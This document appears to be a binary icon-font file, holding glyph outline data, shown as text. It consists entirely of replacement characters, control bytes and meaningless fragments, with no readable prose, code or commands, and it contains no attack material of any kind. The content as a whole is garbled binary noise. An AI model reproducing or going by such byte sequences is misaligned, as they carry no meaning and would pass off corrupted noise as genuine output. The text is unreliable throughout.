����������#'+;G!"3!2654&!5!%!"3!2654&!5!5!5!!"3!2654&##5#53533���&&@&&��@��&&@&&��@��@���&&@&&�@��@��&��&&@&�@�&��&&@&��@�@�&��&&@&���@�����/?N\"32>54.4632#"&1'>54&'79.#"'>32.546773267#"&j��PP��jj��PP����pPPppPPp^�	

	��I11I'V..V�ޱ	

	��I11I'V..V�P��jj��PP��jj��P�PppPPpp[I11I'V..V'I�	

	���I11I'V..V'���	

	�����)#"&'.54676.#"130>54.�0 00`00PP0$HTB<*-I[//���0<H<>TV@0PP00`00 0VT><H<0���//[I-*<BTH$���:.546'.#"&'&67>781>31:3:31281�biS!f==f!Sib%If�[[�fI%�*a	&$$8$#

#$8$$&	a*>&.##.&>@����#'+!2#"&5463!54631323#3#3#3#���5KK55KK5���K5�5K�@````````���K55KK55K�@5KK5��@�@�@�@!"3!2654&!7!	%���(88(@(88�������ggg�����@8(��(88(�(8�Z����&�6nn��"�����#35%7'7 ``���'i�``��@�@�``����'���``@@�@���@�"10>54."&54632BuW2dxddxd2WuBPppPPpp�2WuBx�̂��xBuW2�pPPppPPp���@�'3"10>54.".54>32'4632#"&BuW2dxddxd2WuB)G55G))G55G�I33II33I�2WuBx�̂��xBuW2��5G))G55G))G5�3II33II����!*'.5!"&'&676#!2	 � 

�
�@	��p
^�@��
�@
@
������!$2"32>54.4>32.5
"&'%#j��PP��jj��PP����Aq�VR�8�d�4<�nIR�8��4<Aq�V�P��jj��PP��jj��P�V�qA<4��d8�RIn�<4��8�RV�qA���%%%@���@���������� �@����%%%
%%%%�����`@`��������������Rf��f]��]R]x] @�%+2#5267>54&'.#"33>!3�]�zFFz�]G�225522�GG�2&2	���Nv����Fz�]]�zF`522�GG�22552&_4�Q�g;���@����-%'3"32>54.".54>32�Ӏ��j��PP��jj��PP��jP�i<<i�PP�i<<i�����P��jj��PP��jj��P��<i�PP�i<<i�PP�i<���"32>54.'3j��PP��jj��PP��)Ӏ�Z�P��jj��PP��jj��P���Z@����'7EK"32>54.".54>32>54&#"1%.#">#!5]�zFFz�]]�zFFz�]K�a99a�KK�a99a�\
pP.P2[QE��P.Pp
EQ[�@@Fz�]]�zFFz�]]�zF��9a�KK�a99a�KK�a9�0Pp)"
'6E(�")pP0(E6'���@���:]%4.54&'.'4654&#"3267>5041.#".'.'>7>32O`P!2@$&&)F3P`P<k�V<%%<V�k<�(_4I22I4_(8:

:8 JPU++UPJ 8:

:8�lhHPT
*K=+
$$4GZ1TPHhl3)&&)361DD1			
		
			@���� A5354&+"332>54.#"&'.5467>7326'�%�%�Q�g<Aq�VV�qA<g�q-u@@u-.00.+p==p+.00.�A@%%@AFo�RV�qAAq�VR�oF��.00.-u@@u-,0��:0,-u@@u-����#'373#73#73#3#73#73#3#73#73#%3##5!#5#!!!@����������������������������������@���@��@@�����������@��������@@@@��@��#'!!!";!32654&"&54632!!����&&��&&��%%%%%�����@&��&�&@&�%%%%�@@@�@#'+/37;?C!"3!2654&3##5%3##5%3##5'3#3##53!5!#535#535#53@�&&&&�&���������������@@��@@@@�������@&��&&�&��@����@����@����@�������@�@��
!!!!!'@����� @@���������@@@@
4&#!"#!5!5!7!81!81�&��&��������&&����@@���@�#!"3!2654&!!"&546327!!�@(88(�(88�x��%%%%��8(��(88(@(80 ��%%%%�����@� !"3!2654&"&54632#%!!��&&@&&�� ��@�&��&&�&�.��@����!"3!2654&"&54632%!! ��(88(�(88��


��@�8(��(88(@(8� 



`���/O.'7'&"#132>7>54.#".'.5467>32�B�J�@� �@�-YVS(6qvy??yvq6�)TY[//[YT))TY[//[YT)�	�@�@�	)TY[//[YT))TY[//[YT��6v??v66v??v���!/=	.#!"3!2654&##'#5!'!"&5463!2!"&5463!2��
�@
�%�%<�������@

�
3��

@
4@����%% 0��+�ի



�



���!	.#!"3!2654&##'#5!��
�@
�%�%<������4@����%% 0��+���!3!265	35!37!@���
�
������[@J@���`

������@@�!3!265!5#	7!@���
�
����@@�[@J@���`

�������@@���	###
-'%����H�[�[H�����Ha��aHi������33	3
-5%�������%�[�[%����pcm��mc�������!!!3#!3!3��������@@K5�������@5@@7!265!%3#!!��Pp�p�@@���@@pPPp�@�����+A"32>=4.".532>=".532>=j��PP��jj��PP��jj��PP��jj��PP��jj��PP��jj��PP���,:!�!:,,:!�!:,��,:!�!:,,:!�!:,��,:!�!:,,:!�!:,�!"'!'>32>54.#5d\R#���5�PP�i<"0U(@-P��j�'7#����4<<i�P+QIA`#Vbl9j��P� 7.54>32!.#"-@(U0"<i�PP�5���#R\d5j��P�9lbV#`AIQ+P�i<<4���#7'P��@����
>.	6�+&8�������FO@M��e�����������5	5&&>@�����8&+iOF��������e��Mr�����75	5.7+&8�������FOi�M��e��������r@����%	>&''������8&+iOF�ɸ����e��Mr������"2#"&'5>54&'.54>j��PP��j()Z]`03M,F1P���Aq�VV�qA)3
W4HR\1V�qA����!N%#"&'#".54>322.#"*#"&'5>54&'.54>@$4Y )<iN--Ni<<iN-��h��R%Q*H�359()Z]`03M,F1P��;"8(#(F]55]F((F]5*Kx?n�U1-/{D"@)3
W4HR\1V�qA����$H12#"&'5>54&'.54>3.'#"&'2>7>7>54&5�c��KK��c&&SWX-0D)B.K��c2*M�C H�57hbY''>6?TF�=i�PQ�j='/
Q1
CMV.P�i=��*E&B% !0 K),^1-wDN�.���3W">7>3:3267>7>54&'.'.#512#"&'5>54&'.54>)O&#>253/ )O&#>2552>#&O)j��PP��j()Z]`03M,F1P��

")d6;3.		


")d66d)"

�Aq�VV�qA)3
W4HR\1V�qA����!n%#"&'#".54>32>7>3:3"&'5>54&'.54>32.'.'.'.#"@$4Y )<iN--Ni<<iN-��253/ ()Z]`03M,F1P��jh��RC"	2(>#&O))O&#>;"8(#(F]55]F((F]5*K�)d6;3.		
�)3
W4HR\1V�qA?n�U*N "



"����3X|">7>3233267>7>54&'.'.#512#"&'5>54&'.54>3.'#"&'2>7>7>54&5�&I"!9-0./&I"!9-00-9!"I&c��KK��c&&SWX-0D)B.K��c2*M�C H�57hbY''>6?TF@%Z05..	%Z10Z%�=i�PQ�j='/
Q1
CMV.P�i=��*E&B% !0 K),^1-wDN�.@�@%5>54.#"!4.@5K$NHHN$K5Q�g;�;g��5�J<iN--Ni<J�5-CW00WC-����A%5>54.#"!4.>7.'.5467>7.#"!>75K$NHHN$K5Q�g;�;g���*e9	P9
OZHN$K5Q�g;
�5�J<iN--Ni<J�5-CW00WC-)
*Y-Aw20<:E-Ni<J�5-CW0
	���2>%4>7>54.#"!."32>54.##5#53533�"=U2$NHHN$K5Q�g;�`<iN--Ni<<iN--Nid�@��@��9gVB<<iN--Ni<J�5-CW009-Ni<<iN--Ni<<iN-����@�����26%4>7>54.#"!."32>54.!5!�"=U2$NHHN$K5Q�g;�`<iN--Ni<<iN--Nid��@�9gVB<<iN--Ni<J�5-CW009-Ni<<iN--Ni<<iN-��@���#	'!5.'5>54.#"!���`@�`��@2�K5K$NHHN$K5Q�g;�`��`@�``s&5�J<iN--Ni<J�5-CW0���4632#"&#'#"!4&@pPPppPPp�#�J``J�#`  PppPPpp��lt``���pP��@Pp@=2#".5'4>3">!2#".5'4>3">�.R=##=R..R=#Fz�]@u-	I.R=##=R..R=#Fz�]@u-	#=R..R=##=R. ]�zF�0.
#=R..R=##=R. ]�zF�0.
@=".54>32#5267>7!".54>32#5267>7 .R=##=R..R=#Fz�]@u-	��.R=##=R..R=#Fz�]@u-	@#=R..R=##=R. ]�zF�0.
#=R..R=##=R. ]�zF�0.
@����";W>54&'!!>54.'4>75.51!.=467>7!!.�4U=!��!=U44U=!z!=U4��9S66S9�9S66S9�661�f1666M�M�!^s�H  H�s^!!^s�H  H�s^!�@FhMdMhFFhMdMhF"G@G3 2G@GxKLw8��#/BUht4632#"&4632#"&4632#"&4632#"&81463281#"&5%81463281#"&581463281#"&54632#"&�K55KK55KK55KK55K�%%%%p%&&%��%%%%��&%%& 9'(88('9X****@5KK55KK;5KK55KK�%%%%�%%&&V%%%%p%%&& '99'(88(��**** ���:r.'.'.'.7>7>7>7>7:3265<51'.'.'.'.7>7>7>7>19$#T.-a11_,-O!!46!"N++Z..Y))K1	%f3I((U**S'&E,.C%%O''M$#@)

!�2c-.R"#57#"Q-,^//\++M  24! L)4%�(G.1G&'Q))P%%B+
-A$#K&$3����
-?Pbp�����"&=4632"&=4632"&/&676#"&/&676#"&/.7>"&/.7>#%#"&546;2%81#"&54638132#"&'&6?6#"&'&6?6#"&'.?>#"&'.?>#####�Y-Yf	Z
Z	�7�*�
_��
�o����

���

�$			�m�

��7
		Y	 		Yf
Z
Z�#�##�#�J����-�-��	���Z
*Y*��Z
Z��$	Y

$	ZuZ
Z��!�	 �
x�

����*4C467'7.%>54&'7.'>75#"&'3267'��*;&r'-�-'r&;*��Ep!�RgyB��!pEBygRTC##Cr7}CC}7r�		<07h_T#�+o>>o+�#T_h70<	1S;<:cL1œ;S�1Lc:��!!����'Z"32>54.2#".54>#".'.54>7813267>4&'7j��PP��jj��PP��j5]F((F]55]F((F]fGMT++TMG/  /C11110{CC{01111C/  /�P��jj��PP��jj��P�(F]55]F((F]55]F(��/  /GMT++TMGC2{�{2/33/2{�{2CGMT++TMG9����)6BObn4632#"&81463281#"&4632#"&4632#"&5%4632#"&4632#"&581463281#"&5!#"&54632�K55KK55K�>++>>++>g8('88'(8��2$$22$$2��. !--! .i****w&%%&�C00DD00C@5KK55KK��+>>++>>�(88('88I$22$$22$p!--! ..0****&&%%0DD00CC��F#/;GS%4632#"&4632#"&%4632#"&4632#"&4632#"&%4632#"&4632#"&�8((88((8�`8((88((8@8((88((8�:8((88((8L8((88((8��8((88((8L8((88((8 (88((88�(88((88((88((88N(88((88��(88((88((88((88t(88((88���8".'.5467>732>54&'.'7#3c\T$$8&('%h?+3U!Aq�VV�qA!U3+?h%'(&8$$T\c3@&8$$T\c3I�=;_VM11q;V�qAAq�V;q11MV_;=�I3c\T$$8&���3">3232654.2>7#".54&#"i��RCq�UV�qA8((8P��ji��RCq�UV�qA8((8P���N��h[�vDFz�](88(j��P�N��h[�vDFz�](88(j��P���D�1812233332323023323:323232013023181263623263263>7>7>7>7627267>7261263>7>7>7>7>3>7>7>7>7>7>7>7>7>7>7>7465>7>7467465>7465465645045>5465<5645645<12650451814&5&454&54&5.'.'.'.'&4'4&'.'4&54&5.'.'.'.'.5.'.'.'.'.'.'.'.'.'.'"&'"&#.'.'.#.#.#.'"&#"&#0"#.#"&#*#&"#&"#*#4&#0"#181"#"#"#"#"""#"##0107041465>7467465>7461465>7>7>7465>5>7>7>7>7>7>7>7>7>7>7>7263>7>7263627263>3623623021627:3:7:3263:3:3:323:323021209>720222321233322110109011"#"#""##"#"1*#"*#**#"#*#*#*#&"#*#&"#0"10"9"&'.'"&'"&#.'"&1"&#.#.'.'.#.'.'.'"&'.'.'.'.'.'.'.'.'4&5.'.'4&5&4'4&5.5&45"41<1&4'<5<'<54&5<5<5<5645<5645041049.'	
%	


	%	
&


		$J


#





"


�	



	%	
&	



	%	
%A





"





#���-!7.#"3267>7#".54>327���7�MM�76::67�MM�7	`#Vbl:j��PP��j5d\R#�@�6::67�MM�76::6	T(A-P��jj��P'7#����)7ES!!%!!#!!!#"3!26533!2654&#"&546;2#"&546;2#"&546;2@������x8���8**0*�*0**�����@

@
o���@@@���*��**x��**0*��



�



�@



����"6%'.>54.#"326776&".54>32��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(����"6B%'.>54.#"326776&".54>32##33535#��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]������Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(����������"6:%'.>54.#"326776&".54>32!!��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]����Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(@����
!7')'7''77'7�`��`����`�������`����`�����`�������`����`��`�`��`�����
!'7''77'7)7'@���`����`����`��`����`����`����`��`����`�� ���`�����
''7'!7��`������`����`��`���`��������
''7'!7���`����`����`��`���������!-";535353732>54."&54632�BuW2�{%@���S6BuW22Wu(88((88�2WuB�{�%@��S	
2WuBBuW2��8((88((8����$)9'./.35353535676&'"'&4?62�e5e9��F�� ����	�6���.8-���-
	��		-
		�e5e�6����@��GF9��.7-���-			
-		��	����##54&+"#"3!2654&%46;2!PqO�Oq �\&�&��OqqO�� ��&&�����#2#54&+"32#!"&5463!5463Oq�&�&���qO�qO��&&�� ��Oq����'%>54.#""/3267?6&�3-Ni<*�f6�-Ni<%D�3e��D%<iN-�6f�*<iN-�3e3�37OS54&+"#3;26=!5534&+"!!;26=35#534&+"#3;26=!5!53�����@������@�����������@����@�����������������@����37OS326=4&+5##";33#26=4&+##";35'3#26=4&+5##";3'3#��������������������������@�@�������@������@������6J.>7'#".5#&'>323467>7.'".54>32�	/#e2(G5�

>HM#e%
	.#e2(G5�

>IL$d%
�Z+K9  9K++K9  9K^#LI>�
5G)2#.	�
$#LH?�5G(1#.	�$m 9K++K9  9K++K9 ���0<��%7'./#'737>77'>?5'.'"&546325'.'7'.'7'.'7'./#'''77737>77'>77'>77'>?"&54632l)-:	@	:-)FF)-:	@	:-)FF�%%%%C9C'.8
;%@%;
8.'C9CC9C'.8
;%@%;
8.'C9C��:QQ::QQ�:-)FF)-:	@	:-)FF)-:	@	�%%%%�@%;
8.'C9CC9C'.8
;%@%;
8.'C9CC9C'.8
;%kQ::QQ::Q����%&"'!'#72?64'��'�.���DΠθ.(q�.�.�DΠθ'��q(	����/3'#3#3#5#3#3#%37'	&"2?64''7�@��@@��@@�@���@@@�@�@2��(<|(<��@��@���@@�@@@���@�@�N|<(��<(R�@����)#54&#!"#"3!2654&%!!##5#53533��&�&�5KK55KK������������&&�K5�5KK55K���@��������=5#.'3'#4&1>54&#"0#'3#3#73326737#>7�%�F>:�pPPp�:>F�%��|F>:p,�JJ�,p:>F|�@7a(�OppO���(a7@"A���:EE:�A"����"32>54&'7.#�]�zFFz�]]�zF@SgyB��Fz�]]�zFFz�]6e-�7\A$�@���N7!!3"&5463:37.54632:3:3.54632#*##"&5467'*#*##�����(88(h8((8h�	8((88(�	8((8hh8(@���8((8�(88(�*(88((8��(88(��(8@7!!3#3#3#3#�������������������@����@���@#'7;#";2654&#3#";2654&#3#";2654&#3 �

�

��@�

�

��@�

�

��@
��

@
���
�@

�
�@@
��

@
����$0<5!#3267#"!4&+5>7326=#"&=3%#"&'>=3@���pP"g=@5KK5@=g"Pp���0Dt
�D0
t���Pp2D
�K55K�
D2pP��D0@@9t0D9@@����*:TX\`d>7>76&'.#".'.#"#3!3#'>32#>%&67>312&"'.'.'!!5!5!!!7!5!
 -%K 1=2-:,%	+$�@@�b1 !S&34�q	 
)3O���@��@��@�
<"<"2}11y,&s,��@��N !.+k	

O3)��� ���� ����@�)8.#!"#"3!2654&+>7>54&%!!<5467
�$/,"T/`

@

`/T",/����		1r<O�8+9��



H9+8�O<r(Y//Y(���}@#>'.#!"#"3!2654&+!'y	�@	9`

@

`�d��d

�r��



~������7;#54.#"32>=32654&%.'>7>32#"&#53��<i�PP�i<<i�PP�i<�%%��"		",k99k,"		",k99k����`!:,,:!��!:,,:!`%@%>				��� ����5";26'>54.!####;;26'3265#�(F4T@ $ $ @T4F]5((5
S$ $S
�#=R.Oy��&&yO.R=#��@��@�`
�&&
����=.#">30030&73267>7>7>74&'�)hu�BQ�|c" ##���s_��D/
�*K"X�/)5+<V=:2"5M1/m>7zAk��NHvW$S.$T`k;�j()$`4(TRO#���	#0>	1%5�����Ccp,���@@����
�bH2taA��@@���S2!.54>>5#53.'#53.'.'#5.#"#53#3#333>j��P&Fa;�;aF&P���-ZUj@#R-@  @-R#@jUZ-	�%6%�	�P��jH�s^!!^s�Hj��P��CJO)@"@@	#2FUUF2#	@@"@)OJC����5G"32>54.>54.'>7>32#"&7+"&=4673j��PP��jj��PP����	2F)8.7�MM�7.8)F2	.j99j�

@

 �P��jj��PP��jj��P��1/UF5?s/6::6/s?5FU/1  �@

@�
����6%7>726376&/."?065>??6&'��g
�"@'ag�!
@'�
2	,�'A"�gb'@
!�
h��	3	O����2&67>10>'6.'.1.'A3 (+(
%C^,
'�]B�%a[C	9N((&	8jQ@k�9?hRD!RPE/���Lu�(q u�R<}yq20L.+QPQ+<h`[.D���� %532654&#!";3!26%53!��� 

��

 ��7Ij�jI���



��[���Y��@����7!#"&5!32>5#"&'.'33267>=3��@pPPp@�@Fz�]]�zF�5�KK�549$o#(%&`55`&%(#o$94���PppP@��]�zFFz�]��59955�JE��5`&%((%&`59��J�5@����	
-13!265#3#3#3#3#54&+"#"!54&!#53�&@&�@@�@@�@@�@@����@������&&�����@��@��@�@PPPP?@����
!!%5!!7!5!#53��@����@@����@�����@@�@@#;!54&#!"!"3!2654&%81!81!#+"&=!+"&=#5!��&�&�&&�&&���@�
@
��
@
���@&&@&��&&@&@@�`

``

`@���'''.3?5!����۬&Z&�ۀI��@��@�I�۬&Z&��ۀ����@�@'+#54&#!"332654&'!32654&'3%53��&��&@Q	K55K	b	K55K	Q���`��&&�@!5KK5!!5KK5!������!###!!%3�@�� � ��@ @�� � @����6����4632#"&%'#%37�8((88((8�J�n@�nJ�<��<�`(88((88��<��<���W��a����)5?JU#.'5##335>73'#.'5"&54632#>3.'5>73e
=\uC�Cu\=
ee
=\uC�Cu\=
e�d>)(G9(��%%%%[)>d	(9G�d>)(G9(	Y)>d	(9G(Cu\=
ee
=\uC�Cu\=
ee
=\uC�)>d	(9G�%%%%Yd>)(G9(��)>d	(9G(�d>)(G9(	@����	%0%6&>7%��@�@����	0c�zz�c0	�H�H���G9��9G�^���;;���^�����	!	!�������������@����-1#"&'.5467>7532>54.%3#�2.00.-u@@u-.00.2EvU0Fz�]]�zF0Uv����-�"-u@@u-.00.-u@@u-"�Sp�L]�zFFz�]L�pS��Y�''7''7'2?>[�f�[�sWWs3�D$F-�B�9yuk�[�f�[�sW�Ws��+kuy9�B�-F@����"06!4&#"!"3!2654&%2#"&546!33!26=3'7%���K55K��

@
�S%%%%���
�
��@�:�:@5KK5
��

@
@%%%%��`

`�e�:r�:@���)%!!!!!!'#5#53#575#53#535#535#5�����������@@@�����������������@��2@�<2@��@@@@@���!!%!!!!%!!!!%!!����������������������������������#/!!!!!!4632#"&4632#"&4632#"&������������K55KK55KK55KK55KK55KK55K������@5KK55KK��5KK55KK��5KK55KK���UY]ae%#54&#!5326=4&+";!"#";26=4&+5!#";26=4&+5!#";26=4&#53#5353#53�B.�����.B����܀�����������.B����B.���������������@���@�@@�!!!!!!@����������@�@�@`!!!!!!75'�������������@�@�@��@��@`!!!!!!7�����������@�@����@`!!!!!!7�����������@�@�����$4&'.#".#".#"3!26L9&AU19a!7 8N	(G55G(�Hf.>^0U?$1*N7
4G((G5f@(/.#".#".#";732654&''3533{&AU19a!7 8N	(G55G([��oHfL9������X0U?$1*N7
4G((G5��fH>^�(���@�&->54&#".#".#";!532654&#5#7|^B
d@Be$5]F((F]5��B^L������>	B^:KN<(F]55]F(��^B;X����"(>54&#".#".#"3!2654&'77|^B
d@Be$5]F((F]5`B^L��@`�@�	B^:KN<(F]55]F(^B;X�@`�@�#'#!5!!##	���ࠀ��@��  ���@@�@���� �
7!!%!5!!5!%	##����`  �@@�@@��� ����	33!!#53����`� �@���������@��!!#53	##� �@���`����@����@����%,8DKSYdou~����"32>54.>73##>73!#53'5#'>7>7#>7#>73.'373#..'.'.'53'537.'3#7#.'%>7#>3.'.>73�c��KK��cc��KK����
p���
p�	���
&��&
�u�	���
�1��	�
&P&
���	Qp
�@`& :�{: &`)`& :y: &`�K��cc��KK��cc��K��A!!@@A!!@@!�@�+)R+�)��!@��@!!A��@��+)R+�)��!@�!A@!�,M)#F)M,#�
,M)#3)M,#���c"32>54."&'>=4&#".5.+".5467326?>=>323:3j��PP��jj��PP��j/Y)�
*TB)�

n,F3u�A!5c,F&IQY�P��jj��PP��jj��P�@`
%,%
�	7�O_j94`,�M	
G&&GE_wF 1#S����/\"&'.46?>32"'&4?64'.#"#"&'.46?62326?64'&4762#�
#$$#�#Y11Y##$$#X,X))33�))
�1Y##$$#X,X))33�))+#$$#�#Y1D$Z^Z$�"%%"$Z^Z$W+X)t)�)t)+��%"$Z^Z$W+X)t)�)t)+$Z^Z$�"%��� 3#267#"&'.#">32��@>ff>>ff�#d9Hw!!wH9d#��}�b�~]}H'27>4&'."01267871'01"&'.46787162"'&47�A��(((s(�!""!"UXT"�g/////v{v/A��"TXT!"!!"�(r)((�z
'


EyA��(r)((�"TXU"!""!�g/v{v/////A��"!!"!TXT"�(()r(�z

&
E�=I"32>7.#"&'.'>7>732>54&'1#"&54632T��j$$j��TT��j$$j���.KK.8�CC�8.KK.(F]55]F(�8((88((8/TvGGvT//TvGGvT/�M--M$&&$M--M,5]F((F]5,6(88((88��NZ#5##3353#"&'.'>7>732>5<1.'.#"32>7.'%2#"&546�������K.8�CC�8.KK.(F]55]F()F3 T��j$$j��TT��j$
 1�@(88((88@������!-M$&&$M--M,5]F((F]5.@O,/TvGGvT//TvG2
~8((88((8�@'P!!!5.#"32>7.'!2#"&546#"&'.'>7>732>54&'������ T��j$$j��TT��j$N0�:(88((88�8�CC�8.KK.(F]55]F(.KK.@�@|/TvGGvT//TvG8a'8((88((8��$&&$M--M,5]F((F]5,M--M�&7C`&".#"3267642.546>7>7.'%4&'32>7#"&'32>7.'�(�'R+T��j$X6�		`�� 1
z%8��K.=(B���'5]F(>E.KK.8�C9M-`2T��j$"c=��/TvG>i(�(`(��%z
1 (8�-M,)K=F)F'��(F]�EM--M$&M/TvGCq*���@�	�@@��@�������
	'!7!@@���@@@��@������@
���
)7FTcr��%2#"&=46"&=46322+"&5463+"&546;2"/&4762'&4762"%"'&4?6262"'&4?"32>54."&54632%%%%%%%%�%%@%%�@%@%%@%}-5.5��-5.5g5.5-��5.5-=5]F((F]55]F((F]5B^^BB^^�%@%%@%�%@%%@%�%%%%@%%%%�.5-5�.5-55-5.�<5-5.�(F]55]F((F]55]F(�`^BB^^BB^���"32>54.4>3".j��PP��jj��PP���<i�PP�i<�P��jj��PP��jj��P�P�i<�<i�
���(6DR`n}�"32>54.22#"&=46"&=46322+"&5463+"&546;2"/&4762'&4762"%"'&4?6262"'&4?5]F((F]55]F((F]5B^^B%%%%%%%%�%%@%%�@%@%%@%}-5.5��-5.5g5.5-��5.5-�(F]55]F((F]55]F(�`@^BB^�%@%%@%�%@%%@%�%%%%@%%%%�.5-5�.5-55-5.�<5-5.���
%
%%7'?������<<<<��*��pp��*33A��3�����`���v��$��$�����
%
%%'������<<<<�p��*�33A��3�����`���;�$��v���
%
%%������<<<<33A��3�����`����".#">54.�(J?22?J(8bI*f��NJ��i*Ib�2A""A2*Ib8q���po���m8bI*��� 2.54>32'7>3�8bI*i��JN��f*Ib8-R"N�`�><�*Ib8m���op���q8bI*&|�����]@����#"&54632#"333334&@8((88((8�%@P P@%`(88((88�%��������@%����&#"&546327'.#!"733333'7@8((88((8�1���1o&�{@ @{�&o`(88((88�8#��$�Z���@��@�Z����)D#"&54632#"&54632#"333334&7'.#!"733333'78((88((8@8((88((8���%@P P@%�1���1o&�{@ @{�&o`(88((88((88((88�%��������@%�#��$�Z���@��@�Z����';GS2>54.#"2#".54>2>7#".''4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�V+UQL#7Vo??oV7#LQU�%%%%�%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�	 CtV11VtC �(88((88((88((88���+?"32>54.2#"&546!2#"&546".'32>7j��PP��jj��PP��V%%%%��%%%%�?oV7#LQU++UQL#7Vo�P��jj��PP��jj��P�8((88((88((88((8��1VtC  CtV1���'3?Q2>54.#"2#".54>4632#"&%4632#"&#".'7326j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%@R:FQ,,QF:Rf==f@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%��2#9))9#21<<���+>"32>54.2#"&546!2#"&546".'73267#j��PP��jj��PP��V%%%%��%%%%�,QF:Rf==fR:FQ,�P��jj��PP��jj��P�%%%%%%%%��)9#21<<12#9)���'3?L2>54.#"2#".54>4632#"&%4632#"&##"&=!5j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%�@8((8�@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�@`(88(`@���,8"32>54.2#"&546##"&=!5!'"&54632j��PP��jj��PP����%%%%�@8((8�@%%%%�P��jj��PP��jj��P�%%%%��`(88(`@�%%%%���'3?R2>54.#"2#".54>4632#"&%4632#"&'>32.#"j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%��R:FQ,,QF:Rf==f@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�N2#9))9#21<<1���+="32>54.2#"&546!2#"&546.#"'>32j��PP��jj��PP��V%%%%��%%%%�f==fR:FQ,,QF:�P��jj��PP��jj��P�%%%%%%%%��1<<12#9))9#���';GY2>54.#"2#".54>>7#".'64632#"&%".54632.j��PP��jj��PP��jV�qAAq�VV�qAAq�u4]J6:Xq@,SI<GU^�%%%%��2
8((8
2@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��
"-8 ?mP.*<$	q(88((88!!���1F"32>54.2#"&5462.#"&6546".'67>7#j��PP��jj��PP��V%%%%��-98##89�,SI<GU^14]J6:Xq@�P��jj��PP��jj��P�8((88((88''��*<$	

"-8 ?mP.���'5=AIk�2>54.#"2#".54>;2>=.'.53#535381267>323267>54&#"3!81267>323267>54&#"j��PP��jj��PP��jV�qAAq�VV�qAAq��(F]5�5]F(�@$�����$���**D00D�**D00D@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�`@5]F((F]5@�F&����&F,	$$			0DD0			$$			0DD0		���4V]ah"32>54.2#"&'.#"#81"&'.546!2#"&'.#"#81"&'.54633.3753j��PP��jj��PP��V0D**D��0D**D0��)G3�@�3G�P��jj��PP��jj��P�D0						0DD0						0D���/AP���-PA/���'IY2>54.#"2#".54>2+"&5#+"&=46;235463267#"&'7j��PP��jj��PP��jV�qAAq�VV�qAAq�v
&�&�&�&
�
�
`Ft"6:FQ,$E"4@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�
`&&&&`

  
�D8!#9)7
���$F"32>54."&'73267#+"&5#+"&=46;23546;2j��PP��jj��PP��j$E"4Ft"6:FQ,@&�&�&�&
�
�
�
�P��jj��PP��jj��P��7
D8!#9)�&&&&`

  

���'9Up2>54.#"2#".54>.#"'>32#"&5<1>7>36!>20#"&5467.'.j��PP��jj��PP��jV�qAAq�VV�qAAq�f==fR:FQ,,QF:


	%%4+
�
+4%%	


@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�S1<<12#9))9#�
	
%%$0







0$%%
	���.I["32>54.>7>36#"&5<%>20#"&5467.'..#"'>32j��PP��jj��PP��*4+



	%%��
+4%%	


�f==fR:FQ,,QF:�P��jj��PP��jj��P��$0




	
%%e



0$%%
	�1<<12#9))9#��7Jv�"&5<1>7>36#%.7>20#"&5467.'267#".'734&'.#".'32>54&'>".54>32�%4+



	%��


+4%%	
�=fR:FQ,,QF:Rf=
[: INT,,TNI :[
#  #P��jj��P#  #�V�qAAq�VV�qAAq�%$0




	
%�




0$%%
	�_<12#9))9#21<�"A:X''X:A"7d(8�Ej��PP��jE�8(d��Aq�VV�qAAq�VV�qA��+Fat4&'.#".'32>54&'>>7>36#"&5<%>20#"&5467.'.".'73267#
[: INT,,TNI :[
#  #P��jj��P#  #�@4+



	%%��
+4%%	


,QF:Rf==fR:FQ,�"A:X''X:A"7d(8�Ej��PP��jE�8(d��$0




	
%%e



0$%%
	��)9#21<<12#9)���'3?K2>54.#"2#".54>4632#"&4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�*K55KK55K%%%%��%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��5KK55KK�(88((88((88((88���+7"32>54."&54632"&54632"&54632j��PP��jj��PP����%%%%�5KK55KK�%%%%�P��jj��PP��jj��P�@8((88((8��K55KK55K�8((88((8	���'3?LXdqu2>54.#"2#".54>#"&54632'2#"&5467"32654&##"&54632'2#"&5467"32654&#!!j��PP��jj��PP��jV�qAAq�VV�qAAq�*



 (88((88(B^^BB^^B`



 (88((88(B^^BB^^B���@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��


S8((88((8@^BB^^BB^�


S8((88((8@^BB^^BB^�@@���+7;G#"&54632#"&54632"32>54.4632#"&!5!7"&54632�



@



�j��PP��jj��PP����8((88((8�� (88((88 






�P��jj��PP��jj��P�`(88((88��@�8((88((8���'3?Z2>54.#"2#".54>4632#"&%4632#"&3&'.#&6767>'j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%VA96>xH%"#A96>xH%"#@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%��6a8>%"?#6a8>%"?#���+E"32>54.2#"&546!2#"&546&'.#&6767>'3j��PP��jj��PP��V%%%%��%%%%�>xH%"#A96>xH%"#A9�P��jj��PP��jj��P�%%%%%%%%��8>%"?#6a8>%"